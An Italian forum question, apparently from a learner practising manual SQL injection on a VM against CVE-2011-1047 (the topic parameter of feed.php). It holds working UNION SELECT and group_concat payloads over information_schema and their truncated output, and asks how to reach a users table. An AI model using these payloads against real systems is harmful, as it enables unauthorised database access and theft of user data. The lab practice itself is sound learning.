Questa potrebbe sembrare una domanda noob. Attualmente sto provando l'iniezione SQL su una VM. Questo è quello che sto provando
union select group_concat(table_name) from information_schema.tables#
E l'iniezione funziona. Ma la pagina che viene restituita è un file XML e ogni tag ha una limitazione di dimensioni, quindi posso vedere solo la metà dei risultati.
<title>Bla Forum - Topic: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
C'è un modo per stampare la seconda metà dei risultati. La tabella che ho bisogno di vedere contiene la parola "utente". Se sono troppo ambiguo voglio fare qualcosa sulla falsariga di:
- Disporre le righe del risultato e quindi
group_concatesso - Taglia il risultato (come in
string[10:]) - Seleziona tutte le righe dopo
tables_priv
Quello che ho già provato:
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
Non viene stampato nulla. Ma questa query funziona quando provo direttamente nel MySQL della VM (dopo aver omesso "union" e "#").
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
Non ha funzionato né sull'applicazione Web né direttamente su MySQL di VM.
PS. So che sqlmap farà il lavoro per me, ma voglio provare le cose manualmente.
PPS. Sto cercando CVE-2011-1047 (parametro topic in feed.php)